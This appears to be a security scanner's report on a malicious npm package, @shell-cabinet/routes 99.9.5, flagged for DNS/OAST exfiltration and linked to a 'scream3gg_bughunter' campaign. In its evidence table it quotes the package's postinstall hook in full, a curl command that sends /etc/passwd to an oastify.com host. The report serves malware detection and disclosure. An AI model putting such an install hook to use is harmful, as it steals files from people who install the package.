npm · registry.npmjs.org
@shell-cabinet/routes
DNS / OAST exfiltration: matched "oastify.com"
Early detection
PkgRadar flagged this 6.3 days before public disclosure
Detected 2026-06-03 · disclosed as MAL-2026-5428 on 2026-06-09
Why PkgRadar flagged 99.9.5
| Severity | Signal | Evidence |
|---|---|---|
| high | DNS / OAST exfiltration | matched "oastify.com" · package/package.json |
| high | Install Lifecycle Dns Or Oast | postinstall="node scripts/scream3gg.js && /usr/bin/curl --data '@/etc/passwd' $(hostname).200hj786m7x4kfz1lkr4kmshu80zoqcf.oastify.com" · package.json |
| high | New Account With Lifecycle Hook | package first published 15 day(s) ago, 1 total version(s), has lifecycle hook · package.json |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
99.9.5 | High risk | 65 | 2026-06-13 |
Related campaigns
- scream3gg_bughunter — 8 releases, max score 65
Block this in CI
pkgradar gate --ecosystem npm @shell-cabinet/[email protected]